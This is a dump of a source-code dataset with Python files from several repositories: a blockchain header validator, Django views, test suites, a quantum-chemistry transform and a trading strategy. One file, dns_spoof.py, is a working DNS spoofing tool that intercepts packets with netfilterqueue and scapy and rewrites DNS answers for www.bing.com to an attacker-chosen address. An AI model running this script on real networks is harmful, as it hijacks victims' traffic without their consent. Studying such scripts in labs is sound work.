blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d29a348904016924e690b825b758b20f51d24b6e
|
e82ba9700d831ddc884928eb2cc04173075561e1
|
/torba/torba/client/baseheader.py
|
339dd5e54e13fed55e625d277b9ebe4c5d76b3f3
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
raymondSeger/lbry-sdk
|
ee223d7fbfdd3495a66a457cfaf87e311eb22f44
|
bbc056eef066dfe35967b14f676b22792bbab40e
|
refs/heads/master
| 2022-02-04T11:58:03.309249
| 2019-07-19T15:26:50
| 2019-07-19T15:26:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,851
|
py
|
import os
import logging
from io import BytesIO
from typing import Optional, Iterator, Tuple
from binascii import hexlify
from torba.client.util import ArithUint256
from torba.client.hash import double_sha256
log = logging.getLogger(__name__)
class InvalidHeader(Exception):
def __init__(self, height, message):
super().__init__(message)
self.message = message
self.height = height
class BaseHeaders:
header_size: int
chunk_size: int
max_target: int
genesis_hash: Optional[bytes]
target_timespan: int
validate_difficulty: bool = True
def __init__(self, path) -> None:
if path == ':memory:':
self.io = BytesIO()
self.path = path
self._size: Optional[int] = None
async def open(self):
if self.path != ':memory:':
if not os.path.exists(self.path):
self.io = open(self.path, 'w+b')
else:
self.io = open(self.path, 'r+b')
async def close(self):
self.io.close()
@staticmethod
def serialize(header: dict) -> bytes:
raise NotImplementedError
@staticmethod
def deserialize(height, header):
raise NotImplementedError
def get_next_chunk_target(self, chunk: int) -> ArithUint256:
return ArithUint256(self.max_target)
@staticmethod
def get_next_block_target(chunk_target: ArithUint256, previous: Optional[dict],
current: Optional[dict]) -> ArithUint256:
return chunk_target
def __len__(self) -> int:
if self._size is None:
self._size = self.io.seek(0, os.SEEK_END) // self.header_size
return self._size
def __bool__(self):
return True
def __getitem__(self, height) -> dict:
assert not isinstance(height, slice), \
"Slicing of header chain has not been implemented yet."
return self.deserialize(height, self.get_raw_header(height))
def get_raw_header(self, height) -> bytes:
self.io.seek(height * self.header_size, os.SEEK_SET)
return self.io.read(self.header_size)
@property
def height(self) -> int:
return len(self)-1
@property
def bytes_size(self):
return len(self) * self.header_size
def hash(self, height=None) -> bytes:
return self.hash_header(
self.get_raw_header(height if height is not None else self.height)
)
@staticmethod
def hash_header(header: bytes) -> bytes:
if header is None:
return b'0' * 64
return hexlify(double_sha256(header)[::-1])
async def connect(self, start: int, headers: bytes) -> int:
added = 0
bail = False
for height, chunk in self._iterate_chunks(start, headers):
try:
# validate_chunk() is CPU bound and reads previous chunks from file system
self.validate_chunk(height, chunk)
except InvalidHeader as e:
bail = True
chunk = chunk[:(height-e.height)*self.header_size]
written = 0
if chunk:
self.io.seek(height * self.header_size, os.SEEK_SET)
written = self.io.write(chunk) // self.header_size
self.io.truncate()
# .seek()/.write()/.truncate() might also .flush() when needed
# the goal here is mainly to ensure we're definitely flush()'ing
self.io.flush()
self._size = None
added += written
if bail:
break
return added
def validate_chunk(self, height, chunk):
previous_hash, previous_header, previous_previous_header = None, None, None
if height > 0:
previous_header = self[height-1]
previous_hash = self.hash(height-1)
if height > 1:
previous_previous_header = self[height-2]
chunk_target = self.get_next_chunk_target(height // 2016 - 1)
for current_hash, current_header in self._iterate_headers(height, chunk):
block_target = self.get_next_block_target(chunk_target, previous_previous_header, previous_header)
self.validate_header(height, current_hash, current_header, previous_hash, block_target)
previous_previous_header = previous_header
previous_header = current_header
previous_hash = current_hash
def validate_header(self, height: int, current_hash: bytes,
header: dict, previous_hash: bytes, target: ArithUint256):
if previous_hash is None:
if self.genesis_hash is not None and self.genesis_hash != current_hash:
raise InvalidHeader(
height, "genesis header doesn't match: {} vs expected {}".format(
current_hash.decode(), self.genesis_hash.decode())
)
return
if header['prev_block_hash'] != previous_hash:
raise InvalidHeader(
height, "previous hash mismatch: {} vs expected {}".format(
header['prev_block_hash'].decode(), previous_hash.decode())
)
if self.validate_difficulty:
if header['bits'] != target.compact:
raise InvalidHeader(
height, "bits mismatch: {} vs expected {}".format(
header['bits'], target.compact)
)
proof_of_work = self.get_proof_of_work(current_hash)
if proof_of_work > target:
raise InvalidHeader(
height, "insufficient proof of work: {} vs target {}".format(
proof_of_work.value, target.value)
)
async def repair(self):
previous_header_hash = fail = None
self.io.seek(0)
batch_size = 10000
for start_height in range(0, self.height, batch_size):
headers = self.io.read(self.header_size*batch_size)
for header_hash, header in self._iterate_headers(start_height, headers):
height = header['block_height']
if height:
if header['prev_block_hash'] != previous_header_hash:
fail = True
else:
if header_hash != self.genesis_hash:
fail = True
if fail:
log.warning("Header file corrupted at height %s, truncating it.", height - 1)
self.io.seek((height - 1) * self.header_size, os.SEEK_SET)
self.io.truncate()
self.io.flush()
self._size = None
return
previous_header_hash = header_hash
@staticmethod
def get_proof_of_work(header_hash: bytes) -> ArithUint256:
return ArithUint256(int(b'0x' + header_hash, 16))
def _iterate_chunks(self, height: int, headers: bytes) -> Iterator[Tuple[int, bytes]]:
assert len(headers) % self.header_size == 0, f"{len(headers)} {len(headers)%self.header_size}"
start = 0
end = (self.chunk_size - height % self.chunk_size) * self.header_size
while start < end:
yield height + (start // self.header_size), headers[start:end]
start = end
end = min(len(headers), end + self.chunk_size * self.header_size)
def _iterate_headers(self, height: int, headers: bytes) -> Iterator[Tuple[bytes, dict]]:
assert len(headers) % self.header_size == 0
for idx in range(len(headers) // self.header_size):
start, end = idx * self.header_size, (idx + 1) * self.header_size
header = headers[start:end]
yield self.hash_header(header), self.deserialize(height+idx, header)
|
[
"lex@damoti.com"
] |
lex@damoti.com
|
d9543dbbf9479d52cb98637c34019ef3f722181a
|
7db6c1865cf9102808824ff06cda747b6e572a21
|
/Python/Lib/ApiWsh/api/__init__.py
|
41aa17cca0eea053eef435c89f4e7a83a28b7316
|
[] |
no_license
|
hyteer/testing
|
1f6cabc1d2b67faa4533e6ad7eb5be8c13d542c9
|
1d8b47b3bbb2daf00e4f15b5d18e86111ea4e113
|
refs/heads/master
| 2020-05-21T16:19:08.243676
| 2017-01-03T01:25:17
| 2017-01-03T01:25:17
| 60,914,071
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
# encoding: utf-8
from init_session import InitSession
from shop import Shop
from common import Common
from marketing import Marketing
from utils import CommonUtils
from product import Product
from member import Member
from wexin import Weixin
__all__ = [
"InitSession",
"Common",
"Shop",
"Marketing",
"Product",
"Member",
"Weixin",
"CommonUtils"
]
|
[
"hyteer@qq.com"
] |
hyteer@qq.com
|
a6cfd0b621c47bbada59feb13b42ff40770c9170
|
c83e356d265a1d294733885c373d0a4c258c2d5e
|
/mayan/apps/announcements/views.py
|
8c1c80a96b85a9513f753a1ed3a35b6c541b84dc
|
[
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/fall-2021-hw2-451-unavailable-for-legal-reasons_6YX3
|
4160809d2c96707a196b8c94ea9e4df1a119d96a
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
refs/heads/master
| 2023-08-21T23:36:41.230179
| 2021-10-02T03:51:12
| 2021-10-02T03:51:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,860
|
py
|
import logging
from django.template import RequestContext
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from mayan.apps.views.generics import (
MultipleObjectConfirmActionView, SingleObjectCreateView,
SingleObjectEditView, SingleObjectListView
)
from .icons import icon_announcement_list
from .links import link_announcement_create
from .models import Announcement
from .permissions import (
permission_announcement_create, permission_announcement_delete,
permission_announcement_edit, permission_announcement_view
)
logger = logging.getLogger(name=__name__)
class AnnouncementCreateView(SingleObjectCreateView):
fields = ('label', 'text', 'enabled', 'start_datetime', 'end_datetime')
model = Announcement
view_permission = permission_announcement_create
def get_extra_context(self):
return {
'title': _('Create announcement'),
}
def get_instance_extra_data(self):
return {
'_event_actor': self.request.user
}
class AnnouncementDeleteView(MultipleObjectConfirmActionView):
error_message = _(
'Error deleting announcement "%(instance)s"; %(exception)s'
)
model = Announcement
object_permission = permission_announcement_delete
pk_url_kwarg = 'announcement_id'
post_action_redirect = reverse_lazy(
viewname='announcements:announcement_list'
)
success_message_single = _(
'Announcement "%(object)s" deleted successfully.'
)
success_message_singular = _(
'%(count)d announcement deleted successfully.'
)
success_message_plural = _(
'%(count)d announcements deleted successfully.'
)
title_single = _('Delete announcement: %(object)s.')
title_singular = _('Delete the %(count)d selected announcement.')
title_plural = _('Delete the %(count)d selected announcements.')
def get_extra_context(self):
context = {
'delete_view': True,
}
if self.object_list.count() == 1:
context.update(
{
'object': self.object_list.first(),
}
)
return context
def object_action(self, instance, form=None):
instance.delete()
class AnnouncementEditView(SingleObjectEditView):
fields = ('label', 'text', 'enabled', 'start_datetime', 'end_datetime')
model = Announcement
object_permission = permission_announcement_edit
pk_url_kwarg = 'announcement_id'
post_action_redirect = reverse_lazy(
viewname='announcements:announcement_list'
)
def get_extra_context(self):
return {
'object': self.object,
'title': _('Edit announcement: %s') % self.object,
}
def get_instance_extra_data(self):
return {
'_event_actor': self.request.user
}
class AnnouncementListView(SingleObjectListView):
model = Announcement
object_permission = permission_announcement_view
def get_extra_context(self):
return {
'hide_link': True,
'hide_object': True,
'no_results_icon': icon_announcement_list,
'no_results_main_link': link_announcement_create.resolve(
context=RequestContext(request=self.request)
),
'no_results_text': _(
'Announcements are displayed in the login view. You can use '
'announcements to convery information about your organzation, '
'announcements or usage guidelines for your users.'
),
'no_results_title': _('No announcements available'),
'title': _('Announcements'),
}
|
[
"79801878+Meng87@users.noreply.github.com"
] |
79801878+Meng87@users.noreply.github.com
|
38e00c28fd10a054e3f45b1869c473b5a80aff1c
|
57dfd89d63b3b52eed144653c8264d50fa9fba6e
|
/consolidacion/urls.py
|
ccb88f7779bde647146b0913aaa142b06376d955
|
[] |
no_license
|
geovanniberdugo/siiom
|
c850620214a1a3b8b1fc83ab895c0601241da3b4
|
5e2b72aff7ac5e94a93b7575603114b4ea5f628a
|
refs/heads/main
| 2023-02-16T15:02:30.539674
| 2021-01-15T22:29:36
| 2021-01-15T22:29:36
| 330,036,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 499
|
py
|
from django.urls import re_path
from . import views
app_name = 'consolidacion'
urlpatterns = [
re_path(r'^asignar_grupo_visitas/$', views.asignar_grupo_visitas, name="asignar_grupo_visitas"),
re_path(r'^visitas/nueva/$', views.CrearVisitaView.as_view(), name="crear_visita"),
re_path(r'^visitas/editar/(?P<pk>\d+)/$', views.EditarVisitaView.as_view(), name="editar_visita"),
re_path(r'^api/visitas/asignar/$', views.asignar_grupo_visitas_ajax, name="asignar_grupo_visitas_ajax"),
]
|
[
"geovanni.berdugo@gmail.com"
] |
geovanni.berdugo@gmail.com
|
8d8428dc37777f73a06a488c972c3fc9cb65d1a0
|
68cec278ee55799811b3fd9643c31bab4460457d
|
/honcho/test/integration/test_run.py
|
7195e979d11c6e3137f9562611c873eb0f1cb441
|
[
"MIT"
] |
permissive
|
BoldBigflank/honcho
|
78d03da885172a14898bf2706ce14661c1c7047c
|
bbcb4d6b466c9008c85980307317603afd3bc101
|
refs/heads/master
| 2021-01-18T09:04:10.447029
| 2016-01-26T21:55:20
| 2016-01-26T21:55:20
| 50,392,809
| 0
| 0
| null | 2016-01-26T01:05:43
| 2016-01-26T01:05:43
| null |
UTF-8
|
Python
| false
| false
| 1,318
|
py
|
import sys
import textwrap
from ..helpers import TestCase
from ..helpers import TestEnv
python_bin = sys.executable
script = textwrap.dedent("""
from __future__ import print_function
import os
import sys
print(os.environ.get("ANIMAL", "elephant"))
print("error output", file=sys.stderr)
""")
class TestRun(TestCase):
def test_run(self):
with TestEnv({'test.py': script}) as env:
ret, out, err = env.run_honcho(['run', python_bin, 'test.py'])
self.assertEqual(ret, 0)
self.assertEqual(out, 'elephant\n')
self.assertTrue('error output\n' in err)
def test_run_env(self):
with TestEnv({'.env': 'ANIMAL=giraffe', 'test.py': script}) as env:
ret, out, err = env.run_honcho(['run', python_bin, 'test.py'])
self.assertEqual(ret, 0)
self.assertEqual(out, 'giraffe\n')
def test_run_args_before_command(self):
# Regression test for #122 -- ensure that common args can be given
# before the subcommand.
with TestEnv({'.env.x': 'ANIMAL=giraffe', 'test.py': script}) as env:
ret, out, err = env.run_honcho(['-e', '.env.x',
'run', python_bin, 'test.py'])
self.assertEqual(ret, 0)
self.assertEqual(out, 'giraffe\n')
|
[
"nick@whiteink.com"
] |
nick@whiteink.com
|
a39cb4a7ba8bcae6fe139e57c54bd5c6b056a517
|
f167dffa2f767a0419aa82bf434852069a8baeb8
|
/lib/youtube_dl/extractor/gigya.py
|
412178492fe1062ac83c554617034b6df61cbabd
|
[
"MIT"
] |
permissive
|
firsttris/plugin.video.sendtokodi
|
d634490b55149adfdcb62c1af1eb77568b8da3f5
|
1095c58e2bc21de4ab6fcb67a70e4f0f04febbc3
|
refs/heads/master
| 2023-08-18T10:10:39.544848
| 2023-08-15T17:06:44
| 2023-08-15T17:06:44
| 84,665,460
| 111
| 31
|
MIT
| 2022-11-11T08:05:21
| 2017-03-11T16:53:06
|
Python
|
UTF-8
|
Python
| false
| false
| 677
|
py
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
urlencode_postdata,
)
class GigyaBaseIE(InfoExtractor):
def _gigya_login(self, auth_data):
auth_info = self._download_json(
'https://accounts.eu1.gigya.com/accounts.login', None,
note='Logging in', errnote='Unable to log in',
data=urlencode_postdata(auth_data))
error_message = auth_info.get('errorDetails') or auth_info.get('errorMessage')
if error_message:
raise ExtractorError(
'Unable to login: %s' % error_message, expected=True)
return auth_info
|
[
"noreply@github.com"
] |
firsttris.noreply@github.com
|
7b39b19ccd500ec83103a1e07e89e55b108079df
|
7a6e2a3492b6e237a70b12d75fd05b7a77472af3
|
/py/corePy/13.1_object_intrudce.py
|
7cc7f9937ce8aebe920253080fa91f4d7131c4bb
|
[] |
no_license
|
timtingwei/prac
|
e44b7e4634a931d36ed7e09770447f5dba5f25e6
|
ae77fa781934226ab1e22d6aba6dba152dd15bfe
|
refs/heads/master
| 2020-05-21T17:53:07.144037
| 2017-10-10T14:55:52
| 2017-10-10T14:55:52
| 63,440,125
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,305
|
py
|
#13.1_object_intrudce.py
#/// instance and class
class MyData(object):
""""
def __init__(self):
self.x = 10
self.y = 20
"""
pass
mathObj = MyData()
mathObj.x = 4 #/// x是实例特有的属性,不是类的属性,是动态的
mathObj.y = 5
print (mathObj.x + mathObj.y)
#9
print (mathObj.x * mathObj.y)
#20
#/// method
class MyDataWithMethod(object): #定义类和方法
def printFoo(self):
print ('You invoked printFoo()!')
myObj = MyDataWithMethod() #创建实例
myObj.printFoo() #调用方法
#You invoked printFoo()!
#create a class
class AddrBookEntry(object):
'address book entry class'
def __init__(self,nm,ph): #///在实例化的时候被调用
self.name = nm
self.phone = ph
print ('Created instance for:',self.name) #打印出介绍,self被实例名替换
def updatePhone(self,newph):
self.phone = newph
print ('Updated phone # for: ',self.name)
#create instance
john = AddrBookEntry('John Doe','408-555-1212')
#Created instance for: John Doe
jane = AddrBookEntry('Jane Doe','650-555-1212')
#Created instance for: Jane Doe
print (john)
#<__main__.AddrBookEntry object at 0x028531D0>
print (john.name) #打印实例的名字
#John Doe
print (john.phone)
#408-555-1212
print (jane.name)
#Jane Doe
print (jane.phone)
#650-555-1212
#call method
john.updatePhone('415-555-1212')
#Updated phone # for: John Doe
print (john.phone)
#415-555-1212
#create subclass
class EmplAddrBookEntry(AddrBookEntry):
'Employee Address Book Entry class'
def __init__(self,nm,ph,id,em):
AddrBookEntry.__init__(self,nm,ph) #super().__init__(self)
self.empid = id
self.email = em
def updateEmail(self,newem):
self.email = newem
print ('Updated e-mail address for:',self.name)
john = EmplAddrBookEntry('John Doe','408-555-1212',42,'jogh@hotmail.com')
#Created instance for: John Doe
print (john)
#<__main__.EmplAddrBookEntry object at 0x02883490>
print (john.name) #John Doe
print (john.phone) #408-555-1212
print (john.email) #jogh@hotmail.com
john.updatePhone('415-555-1212') #Updated phone # for: John Doe
print (john.phone) #415-555-1212
john.updateEmail('john@doe.spam') #Updated e-mail address for: John Doe
print (john.email) #john@doe.spam
|
[
"timtingwei@gmail.com"
] |
timtingwei@gmail.com
|
691d455b00d64ff5f36b32c1a00b31fec450c885
|
b3ea7a2d723d432a65748e073cae25e83441580f
|
/dns_spoof.py
|
b1b224ca654ef3801acf63b08b9e01cf3b6380b1
|
[] |
no_license
|
jcohen66/htools
|
7622aa90465abb674e8f413bab7686b26b6a99fd
|
ba8bef2a540e1c58772143b9d3446fd8c30eade7
|
refs/heads/master
| 2023-02-15T04:13:23.419561
| 2020-02-01T19:16:50
| 2020-02-01T19:16:50
| 233,474,276
| 0
| 0
| null | 2023-01-20T23:39:22
| 2020-01-12T23:24:49
|
Python
|
UTF-8
|
Python
| false
| false
| 1,143
|
py
|
#!/usr/bin/env python
# iptables -I FORWARD -j NFQUEUE --queue-num 0
# iptables -I OUTPUT -j NFQUEUE --queue-num 0
# Must do when done: iptables fllush
import netfilterqueue
import scapy.all as scapy
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
# target website
qname = scapy_packet[scapy.DNSQR].qname
# print(scapy_packet.show())
if 'www.bing.com' in qname:
print('[+] Spoofing target')
answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.15')
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
# Remove fields so scapy can recalc..
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
# Convert packet to str and replace
# original payload.
packet.set_payload(str(scapy_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
|
[
"jcohen66@optonline.net"
] |
jcohen66@optonline.net
|
e3ee32f2248a6378906588b43cc58abefa8e0771
|
28d5174b51d43ade5e57dc6498473e8029356b1a
|
/src/openfermion/transforms/_bravyi_kitaev.py
|
2dacc68b00b30341aa27575a0b971c01ba5b5301
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Strilanc/OpenFermion
|
2b350ae7ea464460e1f422a59c8d7033dc5774ef
|
3a0a57b8b545acd2a2ff6b61e88f7c8a8a4437c8
|
refs/heads/master
| 2021-01-25T13:59:21.177659
| 2018-03-02T15:47:22
| 2018-03-02T15:47:22
| 123,639,421
| 1
| 0
| null | 2018-03-02T22:55:29
| 2018-03-02T22:55:28
| null |
UTF-8
|
Python
| false
| false
| 4,691
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bravyi-Kitaev transform on fermionic operators."""
from __future__ import absolute_import
from openfermion.ops import QubitOperator
from openfermion.transforms._fenwick_tree import FenwickTree
def bravyi_kitaev(operator, n_qubits=None):
"""Apply the Bravyi-Kitaev transform and return qubit operator.
Args:
operator (openfermion.ops.FermionOperator):
A FermionOperator to transform.
n_qubits (int|None):
Can force the number of qubits in the resulting operator above the
number that appear in the input operator.
Returns:
transformed_operator: An instance of the QubitOperator class.
Raises:
ValueError: Invalid number of qubits specified.
"""
# Compute the number of qubits.
from openfermion.utils import count_qubits
if n_qubits is None:
n_qubits = count_qubits(operator)
if n_qubits < count_qubits(operator):
raise ValueError('Invalid number of qubits specified.')
# Build the Fenwick tree.
fenwick_tree = FenwickTree(n_qubits)
# Compute transformed operator.
transformed_terms = (
_transform_operator_term(term=term,
coefficient=operator.terms[term],
fenwick_tree=fenwick_tree)
for term in operator.terms
)
return inline_sum(seed=QubitOperator(), summands=transformed_terms)
def _transform_operator_term(term, coefficient, fenwick_tree):
"""
Args:
term (list[tuple[int, int]]):
A list of (mode, raising-vs-lowering) ladder operator terms.
coefficient (float):
fenwick_tree (FenwickTree):
Returns:
QubitOperator:
"""
# Build the Bravyi-Kitaev transformed operators.
transformed_ladder_ops = (
_transform_ladder_operator(ladder_operator, fenwick_tree)
for ladder_operator in term
)
return inline_product(seed=QubitOperator((), coefficient),
factors=transformed_ladder_ops)
def _transform_ladder_operator(ladder_operator, fenwick_tree):
"""
Args:
ladder_operator (tuple[int, int]):
fenwick_tree (FenwickTree):
Returns:
QubitOperator:
"""
index = ladder_operator[0]
# Parity set. Set of nodes to apply Z to.
parity_set = [node.index for node in
fenwick_tree.get_parity_set(index)]
# Update set. Set of ancestors to apply X to.
ancestors = [node.index for node in
fenwick_tree.get_update_set(index)]
# The C(j) set.
ancestor_children = [node.index for node in
fenwick_tree.get_remainder_set(index)]
# Switch between lowering/raising operators.
d_coefficient = -.5j if ladder_operator[1] else .5j
# The fermion lowering operator is given by
# a = (c+id)/2 where c, d are the majoranas.
d_majorana_component = QubitOperator(
(((ladder_operator[0], 'Y'),) +
tuple((index, 'Z') for index in ancestor_children) +
tuple((index, 'X') for index in ancestors)),
d_coefficient)
c_majorana_component = QubitOperator(
(((ladder_operator[0], 'X'),) +
tuple((index, 'Z') for index in parity_set) +
tuple((index, 'X') for index in ancestors)),
0.5)
return c_majorana_component + d_majorana_component
def inline_sum(seed, summands):
"""Computes a sum, using the __iadd__ operator.
Args:
seed (T): The starting total. The zero value.
summands (iterable[T]): Values to add (with +=) into the total.
Returns:
T: The result of adding all the factors into the zero value.
"""
for r in summands:
seed += r
return seed
def inline_product(seed, factors):
"""Computes a product, using the __imul__ operator.
Args:
seed (T): The starting total. The unit value.
factors (iterable[T]): Values to multiply (with *=) into the total.
Returns:
T: The result of multiplying all the factors into the unit value.
"""
for r in factors:
seed *= r
return seed
|
[
"ryanbabbush@gmail.com"
] |
ryanbabbush@gmail.com
|
89c69e1d90ba66dd187d673e41bc6ef863d979f0
|
9efe15e39ffda8391abd5a63b95e441648ba57c2
|
/comments_service/app.py
|
551ddf03f80dc3fd17554f8b88ebd2fce2b36a9a
|
[] |
no_license
|
TechAcademy-Azerbaijan/mini_microservice_app
|
3af2f80047b9a945f07ac1d4c7dd5a01980169e0
|
b06c13a7feac4b9f46ab1d3bed19e36a7de3cd4e
|
refs/heads/master
| 2023-08-15T19:49:22.058966
| 2021-10-22T08:21:40
| 2021-10-22T08:21:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
from flask import Flask
from flask_cors import CORS
app = Flask(__name__)
CORS(app)
from routers import *
if __name__ == '__main__':
app.run(port=5001, debug=True)
|
[
"idris.sabanli@gmail.com"
] |
idris.sabanli@gmail.com
|
63f67629a5a7b16ce7fd1a19104293260e41bb86
|
1b81f2ac5e48b7d91949a6b71c4cc9f9b9f3f19c
|
/vera/params/models.py
|
83f99aecd67832508b05874797e90e7e02e8e836
|
[
"MIT"
] |
permissive
|
erick-otenyo/vera
|
b794d8caf9cb4e183ffbb5ac075122a1475d9cb1
|
bd6a7aed8bdafc8a3025aefa5d54616473f203a6
|
refs/heads/master
| 2020-08-30T07:13:18.258335
| 2017-09-14T15:44:18
| 2017-09-14T15:44:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,778
|
py
|
from django.db import models
from wq.db.patterns import models as patterns
import swapper
swapper.set_app_prefix('params', 'WQ')
# Base metadata classes (Site, ReportStatus, Parameter)
class BaseSite(patterns.IdentifiedModel):
@property
def valid_events(self):
events = self.event_set.filter(
report_set__status__is_valid=True
).values_list('pk', flat=True)
# FIXME: events may be duplicated
return self.event_set.filter(pk__in=events)
class Meta(patterns.IdentifiedModel.Meta):
abstract = True
class BaseReportStatus(patterns.IdentifiedModel):
is_valid = models.BooleanField(default=False)
class Meta(patterns.IdentifiedModel.Meta):
abstract = True
class BaseParameter(patterns.IdentifiedModel):
is_numeric = models.BooleanField(default=False)
units = models.CharField(max_length=50, null=True, blank=True)
wq_label_template = "{{name}}{{#units}} ({{units}}){{/units}}"
class Meta(patterns.IdentifiedModel.Meta):
abstract = True
# Default implementation of the above classes, can be swapped
class Site(BaseSite):
latitude = models.FloatField(null=True, blank=True)
longitude = models.FloatField(null=True, blank=True)
class Meta(BaseSite.Meta):
db_table = 'wq_site'
swappable = swapper.swappable_setting('params', 'Site')
class ReportStatus(BaseReportStatus):
class Meta(BaseReportStatus.Meta):
verbose_name_plural = 'report statuses'
db_table = 'wq_reportstatus'
swappable = swapper.swappable_setting('params', 'ReportStatus')
class Parameter(BaseParameter):
class Meta(BaseParameter.Meta):
db_table = 'wq_parameter'
swappable = swapper.swappable_setting('params', 'Parameter')
|
[
"andrew@wq.io"
] |
andrew@wq.io
|
d466f5bbc2de930da13d832fc7fac286b4311dea
|
d8fe3b5243bec2b61fd7907c4ff799b24bb617e5
|
/LeetCode/MajorityElement.py
|
f1235e14e87b3df2f12c928bee4c7e9c41e4d3f2
|
[
"Unlicense"
] |
permissive
|
SelvorWhim/competitive
|
b89ed252512d88d9346d168dc6b48e0a42a6142d
|
1c73a5c7b2d0dc1b6c4f3f06ace69cdf5c6a34c0
|
refs/heads/master
| 2023-04-13T01:02:52.083519
| 2023-04-11T10:14:38
| 2023-04-11T10:14:38
| 96,573,533
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
from collections import Counter
class Solution:
# lazy solution that works if majority element exists (not hard to check for one if necessary). Should be O(n) time, and anywhere from O(1) to O(k) space depending on most_common implementation, for k number of unique elements
def majorityElement(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
return Counter(nums).most_common(1)[0][0]
|
[
"Carmeverre@gmail.com"
] |
Carmeverre@gmail.com
|
6c5868e7dbe4f882d68893fb9771b13e4d45611d
|
c91f2ebbc7d808fea953249cb8baec35addb0c63
|
/AlgoTrading/examples/WindBasedStrategy.py
|
26e98b38c0ac13455fee9a1e8cd49ee9121c264f
|
[] |
no_license
|
wellengo/AlgoTrading
|
8644dc687ae1524f3b9778624b6fab6299d6336f
|
1d5925580f9fc4b9065df275f79873071742c61a
|
refs/heads/master
| 2021-12-13T22:18:07.413556
| 2017-04-13T04:33:12
| 2017-04-13T04:33:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,757
|
py
|
# -*- coding: utf-8 -*-
u"""
Created on 2015-9-23
@author: cheng.li
"""
import datetime as dt
from AlgoTrading.api import Strategy
from AlgoTrading.api import strategyRunner
from AlgoTrading.api import DataSource
from AlgoTrading.api import set_universe
from PyFin.api import MA
from PyFin.api import MAX
from PyFin.api import MIN
class MovingAverageCrossStrategy(Strategy):
def __init__(self):
filtering = (MAX(10, 'close') / MIN(10, 'close')) >= 1.00
indicator = MA(10, 'close') - MA(120, 'close')
self.signal = indicator[filtering]
def handle_data(self):
for s in self.universe:
amount = self.avaliableForSale(s)
if self.signal[s] > 0. and self.secPos[s] == 0:
self.order(s, 1, quantity=200)
if self.signal[s] < 0. and amount != 0:
self.order(s, -1, quantity=200)
def run_example():
universe = set_universe('000300.zicn', refDate='2015-01-01')[:200]
startDate = dt.datetime(2015, 1, 1)
endDate = dt.datetime(2017, 1, 1)
strategyRunner(userStrategy=MovingAverageCrossStrategy,
symbolList=universe,
startDate=startDate,
endDate=endDate,
benchmark='000300.zicn',
logLevel='info',
saveFile=True,
plot=True,
freq='D')
if __name__ == "__main__":
from VisualPortfolio.Env import Settings
from AlgoTrading.Env import Settings
Settings.set_source(DataSource.WIND)
startTime = dt.datetime.now()
print("Start: %s" % startTime)
run_example()
endTime = dt.datetime.now()
print("End : %s" % endTime)
print("Elapsed: %s" % (endTime - startTime))
|
[
"siqiao_xue@163.com"
] |
siqiao_xue@163.com
|
69b3a8a5656a6229d00db9a433b364d43faecb76
|
266947fd84eed629ed0c21f6d91134239512afd9
|
/BeginnerContest_B/070.py
|
44ab7e3e3b48dab05d40236c4d90574db6a44ef3
|
[] |
no_license
|
SkiMsyk/AtCoder
|
c86adeec4fa470ec14c1be7400c9fc8b3fb301cd
|
8102b99cf0fb6d7fa304edb942d21cf7016cba7d
|
refs/heads/master
| 2022-09-03T01:23:10.748038
| 2022-08-15T01:19:55
| 2022-08-15T01:19:55
| 239,656,752
| 0
| 0
| null | null | null | null |
UTF-8
|
